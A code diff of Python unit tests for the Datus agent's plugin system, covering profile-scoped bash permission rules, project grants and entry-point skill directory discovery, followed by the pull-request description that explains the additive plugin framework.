+
+    def test_initial_config_carries_normal_plugin_rules(self):
+        mgr = self._manager()
+        assert "datus hello greet:*" in mgr.global_config.bash_commands.allow
+
+    def test_switch_to_auto_applies_auto_plugin_rules(self):
+        mgr = self._manager()
+        mgr.switch_profile("auto")
+        assert "datus hello:*" in mgr.global_config.bash_commands.allow
+        # normal-only rules are not carried across profiles.
+        assert "datus hello greet:*" not in mgr.global_config.bash_commands.allow
+
+    def test_switch_to_dangerous_stays_ungated(self):
+        mgr = self._manager()
+        mgr.switch_profile("dangerous")
+        assert mgr.global_config.bash_commands is None
+
+    def test_switch_back_to_normal_restores_plugin_rules(self):
+        mgr = self._manager()
+        mgr.switch_profile("dangerous")
+        mgr.switch_profile("normal")
+        assert "datus hello greet:*" in mgr.global_config.bash_commands.allow
+        assert "datus hello config set:*" in mgr.global_config.bash_commands.ask
+
+    def test_plugin_rules_coexist_with_project_bash_allows(self):
+        from unittest.mock import patch
+
+        mgr = self._manager()
+        with patch("datus.configuration.project_config.append_project_bash_allow"):
+            mgr.add_project_bash_allow("make:*")
+        mgr.switch_profile("auto")
+        assert "make:*" in mgr.global_config.bash_commands.allow
+        assert "datus hello:*" in mgr.global_config.bash_commands.allow
+
+    def test_profile_singletons_never_mutated_by_switches(self):
+        from datus.tools.permission.profiles import get_profile
+
+        before = list(get_profile("auto").bash_commands.allow)
+        mgr = self._manager()
+        mgr.switch_profile("auto")
+        mgr.switch_profile("normal")
+        assert get_profile("auto").bash_commands.allow == before
+
+    def test_manager_without_plugin_rules_unchanged(self):
+        from datus.tools.permission.profiles import get_profile
+
+        mgr = PermissionManager(global_config=get_profile("normal"), active_profile="normal")
+        mgr.switch_profile("auto")
+        assert all("datus hello" not in p for p in mgr.global_config.bash_commands.allow)
+
+
+class TestProjectBashGrants:
+    """Exact-match project grants that can bypass ask-rule hits."""
+
+    def test_constructor_seeds_grants(self):
+        from datus.tools.permission.profiles import get_profile
+
+        mgr = PermissionManager(
+            global_config=get_profile("normal"),
+            project_bash_allows=["datus hello config set:*"],
+        )
+        assert mgr.has_project_bash_grant("datus hello config set:*")
+        assert not mgr.has_project_bash_grant("datus hello:*")
+        assert not mgr.has_project_bash_grant(None)
+
+    def test_add_project_bash_allow_registers_grant(self):
+        from unittest.mock import patch
+
+        from datus.tools.permission.profiles import get_profile
+
+        mgr = PermissionManager(global_config=get_profile("normal"))
+        with patch("datus.configuration.project_config.append_project_bash_allow"):
+            mgr.add_project_bash_allow("datus hello config set:*")
+        assert mgr.has_project_bash_grant("datus hello config set:*")
+
+    def test_grants_survive_profile_switches(self):
+        from datus.tools.permission.profiles import get_profile
+
+        mgr = PermissionManager(
+            global_config=get_profile("normal"),
+            project_bash_allows=["datus hello config set:*"],
+        )
+        mgr.switch_profile("auto")
+        assert mgr.has_project_bash_grant("datus hello config set:*")
+
+    def test_is_plugin_ask_pattern_scoped_to_active_profile(self):
+        from datus.tools.permission.bash_rules import BashCommandRules
+        from datus.tools.permission.profiles import get_profile
+
+        mgr = PermissionManager(
+            global_config=get_profile("normal"),
+            active_profile="normal",
+            plugin_bash_rules={
+                "normal": BashCommandRules(ask=["datus hello config set:*"]),
+                "auto": BashCommandRules(ask=["datus hello config del:*"]),
+            },
+        )
+        assert mgr.is_plugin_ask_pattern("datus hello config set:*")
+        assert not mgr.is_plugin_ask_pattern("datus hello config del:*")  # auto-only
+        assert not mgr.is_plugin_ask_pattern("docker:*")
+        assert not mgr.is_plugin_ask_pattern(None)
+        mgr.switch_profile("auto")
+        assert mgr.is_plugin_ask_pattern("datus hello config del:*")
+        assert not mgr.is_plugin_ask_pattern("datus hello config set:*")

--- a/tests/unit_tests/tools/permission/test_profiles.py
+++ b/tests/unit_tests/tools/permission/test_profiles.py
@@ -384,3 +384,75 @@ class TestProfileBashCommands:
         assert evaluate_bash_command("git status", effective.bash_commands).level == PermissionLevel.ALLOW
         # user deny overrides the profile's allow (deny wins by decision order)
         assert evaluate_bash_command("git diff HEAD~1", effective.bash_commands).level == PermissionLevel.DENY
+
+
+class TestPluginBashRulesMerge:
+    """Plugin-declared bash rules layered into build_effective_config."""
+
+    @staticmethod
+    def _plugin_rules():
+        from datus.tools.permission.bash_rules import BashCommandRules
+
+        return BashCommandRules(
+            allow=["datus hello greet:*"],
+            ask=["datus hello config set:*"],
+            deny=["datus hello config wipe:*"],
+        )
+
+    def test_plugin_rules_merged_into_normal(self):
+        from datus.tools.permission.bash_rules import evaluate_bash_command
+        from datus.tools.permission.permission_config import PermissionLevel
+        from datus.tools.permission.profiles import build_effective_config
+
+        effective = build_effective_config("normal", None, plugin_bash_rules=self._plugin_rules())
+
+        assert evaluate_bash_command("datus hello greet Ada", effective.bash_commands).level == PermissionLevel.ALLOW
+        ask = evaluate_bash_command("datus hello config set k v", effective.bash_commands)
+        assert ask.level == PermissionLevel.ASK
+        assert ask.bucket == "datus hello config set:*"
+        assert evaluate_bash_command("datus hello config wipe all", effective.bash_commands).level == (
+            PermissionLevel.DENY
+        )
+        # Profile whitelist retained alongside plugin rules.
+        assert evaluate_bash_command("git status", effective.bash_commands).level == PermissionLevel.ALLOW
+
+    def test_profile_singleton_not_mutated(self):
+        from datus.tools.permission.profiles import NORMAL, build_effective_config, get_profile
+
+        before_allow = list(NORMAL.bash_commands.allow)
+        build_effective_config("normal", None, plugin_bash_rules=self._plugin_rules())
+        assert get_profile("normal").bash_commands.allow == before_allow
+
+    def test_user_deny_beats_plugin_allow(self):
+        from datus.tools.permission.bash_rules import evaluate_bash_command
+        from datus.tools.permission.permission_config import PermissionLevel
+        from datus.tools.permission.profiles import build_effective_config
+
+        effective = build_effective_config(
+            "normal",
+            {"bash_commands": {"deny": ["datus hello greet:*"]}},
+            plugin_bash_rules=self._plugin_rules(),
+        )
+        assert evaluate_bash_command("datus hello greet Ada", effective.bash_commands).level == PermissionLevel.DENY
+
+    def test_user_explicit_default_still_wins(self):
+        from datus.tools.permission.permission_config import PermissionLevel
+        from datus.tools.permission.profiles import build_effective_config
+
+        effective = build_effective_config(
+            "normal", {"default": "allow", "rules": []}, plugin_bash_rules=self._plugin_rules()
+        )
+        assert effective.default_permission == PermissionLevel.ALLOW
+
+    def test_dangerous_ignores_plugin_rules(self):
+        from datus.tools.permission.profiles import build_effective_config
+
+        effective = build_effective_config("dangerous", None, plugin_bash_rules=self._plugin_rules())
+        assert effective.bash_commands is None
+
+    def test_empty_plugin_rules_are_noop(self):
+        from datus.tools.permission.bash_rules import BashCommandRules
+        from datus.tools.permission.profiles import NORMAL, build_effective_config
+
+        effective = build_effective_config("normal", None, plugin_bash_rules=BashCommandRules())
+        assert effective is NORMAL

--- a/tests/unit_tests/tools/skill_tools/test_skill_config.py
+++ b/tests/unit_tests/tools/skill_tools/test_skill_config.py
@@ -17,7 +17,44 @@ from datus.tools.skill_tools.skill_config import (
     SkillMetadata,
     _builtin_skills_dir,
     _default_skill_directories,
+    _entry_point_skill_directories,
 )
+
+
+class _FakeEntryPoint:
+    """Minimal stand-in for ``importlib.metadata.EntryPoint``."""
+
+    def __init__(self, name, loaded, *, raises=False):
+        self.name = name
+        self.group = "datus.skills"
+        self._loaded = loaded
+        self._raises = raises
+
+    def load(self):
+        if self._raises:
+            raise ImportError("boom")
+        return self._loaded
+
+
+class _FakeEntryPoints:
+    """Mimics the ``select(group=...)`` API of modern importlib.metadata."""
+
+    def __init__(self, eps):
+        self._eps = eps
+
+    def select(self, *, group, name=None):
+        out = [ep for ep in self._eps if ep.group == group]
+        if name is not None:
+            out = [ep for ep in out if ep.name == name]
+        return out
+
+
+def _patch_entry_points(monkeypatch, eps):
+    """Patch ``importlib.metadata.entry_points`` (resolved lazily inside the
+    discovery helper) to return our fake set."""
+    import importlib.metadata as importlib_metadata
+
+    monkeypatch.setattr(importlib_metadata, "entry_points", lambda: _FakeEntryPoints(eps))
 
 
 class TestSkillConfig:
@@ -95,12 +132,224 @@ class TestSkillConfig:
         assert config.directories == _default_skill_directories()
         assert config.warn_duplicates is False
 
+
+class TestEntryPointSkillDirectories:
+    """Tests for ``datus.skills`` entry-point discovery."""
+
+    def test_discovers_str_path_entry_point(self, monkeypatch, tmp_path):
+        """A string directory returned by an entry point is discovered."""
+        skill_dir = tmp_path / "adapter_skills"
+        skill_dir.mkdir()
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("hello", str(skill_dir))])
+        result = _entry_point_skill_directories()
+        assert result == [str(skill_dir)]
+
+    def test_discovers_path_object_entry_point(self, monkeypatch, tmp_path):
+        """A ``Path`` object (not just str) is coerced and discovered."""
+        skill_dir = tmp_path / "adapter_skills"
+        skill_dir.mkdir()
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("hello", skill_dir)])
+        result = _entry_point_skill_directories()
+        assert result == [str(skill_dir)]
+
+    def test_discovers_callable_entry_point(self, monkeypatch, tmp_path):
+        """A zero-arg callable returning a directory is invoked and discovered."""
+        skill_dir = tmp_path / "adapter_skills"
+        skill_dir.mkdir()
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("hello", lambda: str(skill_dir))])
+        result = _entry_point_skill_directories()
+        assert result == [str(skill_dir)]
+
+    def test_skips_nonexistent_directory(self, monkeypatch, tmp_path):
+        """An entry point pointing at a missing directory is silently skipped."""
+        missing = tmp_path / "does_not_exist"
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("hello", str(missing))])
+        assert _entry_point_skill_directories() == []
+
+    def test_skips_file_path(self, monkeypatch, tmp_path):
+        """A path that is a file (not a directory) is skipped."""
+        f = tmp_path / "a_file.md"
+        f.write_text("x")
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("hello", str(f))])
+        assert _entry_point_skill_directories() == []
+
+    def test_swallows_load_exception(self, monkeypatch, tmp_path):
+        """A broken entry point ``load()`` does not break discovery of others."""
+        good = tmp_path / "good"
+        good.mkdir()
+        _patch_entry_points(
+            monkeypatch,
+            [
+                _FakeEntryPoint("broken", None, raises=True),
+                _FakeEntryPoint("hello", str(good)),
+            ],
+        )
+        assert _entry_point_skill_directories() == [str(good)]
+
+    def test_dedupes_duplicate_directories(self, monkeypatch, tmp_path):
+        """Two entry points resolving to the same directory collapse to one."""
+        skill_dir = tmp_path / "adapter_skills"
+        skill_dir.mkdir()
+        _patch_entry_points(
+            monkeypatch,
+            [
+                _FakeEntryPoint("a", str(skill_dir)),
+                _FakeEntryPoint("b", str(skill_dir)),
+            ],
+        )
+        assert _entry_point_skill_directories() == [str(skill_dir)]
+
+    def test_lookup_failure_returns_empty(self, monkeypatch):
+        """A failure resolving entry points returns an empty list, never raises."""
+        import importlib.metadata as importlib_metadata
+
+        def _boom():
+            raise RuntimeError("metadata broken")
+
+        monkeypatch.setattr(importlib_metadata, "entry_points", _boom)
+        assert _entry_point_skill_directories() == []
+
+    def test_default_directories_ordering(self, monkeypatch, tmp_path):
+        """Scan order is project → user → entry-point dirs → packaged builtin (last)."""
+        ep_dir = tmp_path / "adapter_skills"
+        ep_dir.mkdir()
+        builtin_dir = tmp_path / "builtin_skills"
+        builtin_dir.mkdir()
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("hello", str(ep_dir))])
+        monkeypatch.setattr("datus.tools.skill_tools.skill_config._builtin_skills_dir", lambda: str(builtin_dir))
+        dirs = _default_skill_directories()
+        assert dirs[0] == "./.datus/skills"
+        assert dirs[1] == "~/.datus/skills"
+        # entry-point dir comes before the packaged builtin, builtin is last
+        assert dirs.index(str(ep_dir)) < dirs.index(str(builtin_dir))
+        assert dirs[-1] == str(builtin_dir)
+
+    def test_from_dict_appends_entry_point_dirs(self, monkeypatch, tmp_path):
+        """Explicit ``directories`` still get adapter entry-point dirs appended."""
+        ep_dir = tmp_path / "adapter_skills"
+        ep_dir.mkdir()
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("hello", str(ep_dir))])
+        config = SkillConfig.from_dict({"directories": ["/my/skills"]})
+        assert config.directories[0] == "/my/skills"
+        assert str(ep_dir) in config.directories
+
+    def test_default_dirs_dedupe_entry_point_against_listed(self, monkeypatch, tmp_path):
+        """An entry-point dir already present is not appended twice."""
+        ep_dir = tmp_path / "adapter_skills"
+        ep_dir.mkdir()
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("hello", str(ep_dir))])
+        config = SkillConfig.from_dict({"directories": [str(ep_dir), "/other"]})
+        assert config.directories.count(str(ep_dir)) == 1
+
     def test_skill_config_serialization(self):
         """Test SkillConfig serialization."""
         config = SkillConfig(directories=["/test"])
         data = config.model_dump()
         assert data["directories"] == ["/test"]
         assert data["warn_duplicates"] is True
+
+
+class TestPluginSkillDirectories:
+    """``datus.plugins`` skill dirs merge into the scan order before legacy
+    ``datus.skills`` adapters."""
+
+    def test_plugin_dir_included_before_legacy_and_builtin(self, monkeypatch, tmp_path):
+        plugin_dir = tmp_path / "plugin_skills"
+        plugin_dir.mkdir()
+        legacy_dir = tmp_path / "legacy_skills"
+        legacy_dir.mkdir()
+        builtin_dir = tmp_path / "builtin_skills"
+        builtin_dir.mkdir()
+        monkeypatch.setattr("datus.plugins.registry.plugin_skill_directories", lambda: [str(plugin_dir)])
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("mwaa", str(legacy_dir))])
+        monkeypatch.setattr("datus.tools.skill_tools.skill_config._builtin_skills_dir", lambda: str(builtin_dir))
+
+        dirs = _default_skill_directories()
+        assert dirs[0] == "./.datus/skills"
+        assert dirs[1] == "~/.datus/skills"
+        # plugin dir precedes the legacy datus.skills dir.
+        assert dirs.index(str(plugin_dir)) < dirs.index(str(legacy_dir))
+        assert dirs[-1] == str(builtin_dir)
+
+    def test_plugin_dir_deduped_against_legacy(self, monkeypatch, tmp_path):
+        shared = tmp_path / "shared_skills"
+        shared.mkdir()
+        # Same dir contributed by both a plugin and a legacy adapter appears once.
+        monkeypatch.setattr("datus.plugins.registry.plugin_skill_directories", lambda: [str(shared)])
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("mwaa", str(shared))])
+        assert _default_skill_directories().count(str(shared)) == 1
+
+    def test_from_dict_appends_plugin_dirs(self, monkeypatch, tmp_path):
+        plugin_dir = tmp_path / "plugin_skills"
+        plugin_dir.mkdir()
+        monkeypatch.setattr("datus.plugins.registry.plugin_skill_directories", lambda: [str(plugin_dir)])
+        _patch_entry_points(monkeypatch, [])
+        config = SkillConfig.from_dict({"directories": ["/my/skills"]})
+        assert config.directories[0] == "/my/skills"
+        assert str(plugin_dir) in config.directories
+
+    def test_plugin_discovery_failure_is_swallowed(self, monkeypatch):
+        def boom():
+            raise RuntimeError("registry import exploded")
+
+        monkeypatch.setattr("datus.plugins.registry.plugin_skill_directories", boom)
+        _patch_entry_points(monkeypatch, [])
+        # Must not raise; falls back to the non-plugin default order.
+        dirs = _default_skill_directories()
+        assert dirs[:2] == ["./.datus/skills", "~/.datus/skills"]
+
+
+class _FakeManager:
+    def __init__(self, data):
+        self.data = data
+
+
+class TestPluginsEnabledGate:
+    """``agent.plugins_enabled: false`` removes plugin skill dirs everywhere."""
+
+    def _disable(self, monkeypatch):
+        from datus.configuration import agent_config_loader
+
+        monkeypatch.setattr(agent_config_loader, "CONFIGURATION_MANAGER", _FakeManager({"plugins_enabled": False}))
+
+    def test_disabled_excludes_plugin_dirs_from_default(self, monkeypatch, tmp_path):
+        plugin_dir = tmp_path / "plugin_skills"
+        plugin_dir.mkdir()
+        legacy_dir = tmp_path / "legacy_skills"
+        legacy_dir.mkdir()
+        monkeypatch.setattr("datus.plugins.registry.plugin_skill_directories", lambda: [str(plugin_dir)])
+        _patch_entry_points(monkeypatch, [_FakeEntryPoint("mwaa", str(legacy_dir))])
+        self._disable(monkeypatch)
+
+        dirs = _default_skill_directories()
+        assert str(plugin_dir) not in dirs
+        # Legacy ``datus.skills`` adapters are not governed by the switch.
+        assert str(legacy_dir) in dirs
+
+    def test_disabled_excludes_plugin_dirs_from_from_dict(self, monkeypatch, tmp_path):
+        plugin_dir = tmp_path / "plugin_skills"
+        plugin_dir.mkdir()
+        monkeypatch.setattr("datus.plugins.registry.plugin_skill_directories", lambda: [str(plugin_dir)])
+        _patch_entry_points(monkeypatch, [])
+        self._disable(monkeypatch)
+
+        config = SkillConfig.from_dict({"directories": ["/my/skills"]})
+        assert str(plugin_dir) not in config.directories
+
+    @pytest.mark.parametrize("value,expected", [(None, True), (True, True), ("false", False), ("off", False)])
+    def test_enabled_flag_coercion(self, monkeypatch, value, expected):
+        from datus.configuration import agent_config_loader
+        from datus.tools.skill_tools.skill_config import _plugins_system_enabled
+
+        monkeypatch.setattr(agent_config_loader, "CONFIGURATION_MANAGER", _FakeManager({"plugins_enabled": value}))
+        assert _plugins_system_enabled() is expected
+
+    def test_no_loaded_config_defaults_to_enabled(self, monkeypatch):
+        from datus.configuration import agent_config_loader
+        from datus.tools.skill_tools.skill_config import _plugins_system_enabled
+
+        monkeypatch.setattr(agent_config_loader, "CONFIGURATION_MANAGER", None)
+        assert _plugins_system_enabled() is True
 
 
 class TestSkillMetadata:

--- a/tests/unit_tests/tools/skill_tools/test_skill_registry_unit.py
+++ b/tests/unit_tests/tools/skill_tools/test_skill_registry_unit.py
@@ -348,9 +348,21 @@ class TestBuiltinSkillsResolution:
         # First-wins: the description must come from the override, not the built-in.
         assert skill.description == "User-shadow init"
 
-    def test_from_dict_does_not_duplicate_builtin(self):
+    def test_from_dict_does_not_duplicate_builtin(self, monkeypatch):
         """from_dict must be idempotent when the user already lists the packaged dir."""
+        import importlib.metadata as importlib_metadata
+
         from datus.tools.skill_tools.skill_config import _builtin_skills_dir
+
+        # Isolate from any installed plugin/adapter skill dirs (datus.plugins /
+        # datus.skills) so the assertion reflects only builtin de-duplication.
+        monkeypatch.setattr("datus.plugins.registry.plugin_skill_directories", lambda: [])
+
+        class _NoEntryPoints:
+            def select(self, *, group, name=None):
+                return []
+
+        monkeypatch.setattr(importlib_metadata, "entry_points", lambda: _NoEntryPoints())
 
         builtin = _builtin_skills_dir()
         assert isinstance(builtin, str)


### PR DESCRIPTION
## Why

Datus needs an installable plugin system so third-party packages can extend the
agent with `datus <plugin>` CLI subcommands, bundled skills, system-prompt
context, namespace-scoped bash permissions, and tool-argument transformers —
without any change to datus-agent itself.

The upstream plugin restructure bundled this framework together with the removal
of the scheduler-adapter subsystem. This PR ports **only the additive plugin
framework** and deliberately keeps the scheduler-adapter and sql-policy
capabilities fully intact, so no existing behavior changes.

## Solution

Additively introduce the `datus.plugins` framework, gated end-to-end by the
`agent.plugins_enabled` master switch (default `true`) and a no-op when no plugin
is installed:

- **datus/plugins** — `datus.plugins` entry-point discovery + duck-typed contract
  (`run_cli` required; optional `skills_dir` / `system_prompt` / `cli_permissions`
  / `tool_transformers`), per-profile CLI bash-permission collection,
  tool-transformer collection, system-prompt sections; process-level cache with
  test invalidation.
- **datus/tools/middleware** — rebuilds `FunctionTool` to rewrite or deny
  tool-call arguments (fail-closed) before execution, reusing the proxy layer's
  pattern syntax.
- **CLI** — `datus <plugin>` dispatch + legacy `datus.cli_commands` dispatch
  before argparse/REPL, with `--profile` / `--config` global stripping.
- **config** — `agent.plugins.<name>.<profile>`, `plugins_enabled` switch,
  `get_plugin_profile` resolution, project-level plugin pins & `bash_allow`
  grants (`.datus/config.yml`).
- **permissions** — namespace-scoped bash rules (`datus <plugin> ...`), project
  ask-rule bypass, plugin rules re-applied across profile switches; a user
  `deny` always beats a plugin `allow`.
- **skills** — discover skill dirs contributed by `datus.plugins` / `datus.skills`.
- **nodes** — lazy tool-transformer wrapping + plugin system-prompt injection.

Key decision / tradeoff: the framework is intentionally decoupled from any
concrete adapter (plugins never import `datus.*`), and scheduler-adapter /
sql-policy are left untouched — adding the plugin surface is separated from the
upstream "remove scheduler" change.

## Test Cases

Unit tests only (deterministic, no external calls); PR harness diff coverage 91.2%:

- `tests/unit_tests/plugins/test_registry.py` — discovery, class-hook resolution,
  CLI-permission prefixing/validation, tool-transformer collection, defensive
  "never raises" paths.
- `tests/unit_tests/tools/middleware/test_tool_middleware.py` — arg rewrite/deny
  fail-closed, metadata/guardrail preservation, proxied-tool skip, per-call
  context.
- `tests/unit_tests/cli/test_plugin_dispatch.py`, `test_external_command_dispatch.py`
  — dispatch, profile resolution, plugins-disabled gate, reserved-subcommand /
  leading-flag fall-through.
- Added plugin cases to `test_agent_config*.py`, `test_project_config.py`,
  permission suites (`test_bash_rules` / `manager` / `hooks` / `profiles`), and
  skill suites (`test_skill_config` / `registry_unit`); a `conftest` autouse
  fixture resets the plugin cache between tests.

Regression: scheduler-adapter and sql-policy suites pass unchanged; full `tools/`
+ `agent/node/` run is green (4754 passed, 7 skipped).

🤖 Generated with [Claude Code](https://claude.com/claude-code)

## Backport

<!-- Auto-generated below by .github/workflows/sync-backport-checklist.yml. Tick the release branches to backport this PR to after merge. -->

- [ ] release/0.3.1
- [ ] release/0.3.2
- [ ] release/0.3.3
- [ ] release/0.3.4
- [ ] release/0.3.5
- [ ] release/0.3.6
- [ ] release/0.3.7
## Summary by CodeRabbit

* **New Features**
  * Added plugin support for CLI commands, skill discovery, prompt sections, tool argument rewriting, and plugin-specific permission rules.
  * Added project-level plugin pinning and profile selection.

* **Bug Fixes**
  * Improved permission handling for plugin commands, including exact project grants and clearer allow/ask/deny behavior.
  * Made plugin and adapter dispatch more resilient so invalid packages or handlers no longer break the CLI.

* **Documentation**
  * Added new plugin guides in English and Chinese, plus updated navigation and configuration examples.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added plugin support for CLI commands, skills, system prompts, permissions, and tool argument handling.
  * Project configuration can now pin plugin profiles and control plugin-related bash allowances.
  * Skill discovery now includes contributed skills from plugins and legacy extensions.

* **Bug Fixes**
  * Improved permission prompts and approvals for plugin commands, including exact project-level allow behavior.
  * Added safer handling so broken plugin configurations or commands won’t crash the app.

* **Documentation**
  * Added new plugin introduction and development guides in English and Chinese.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->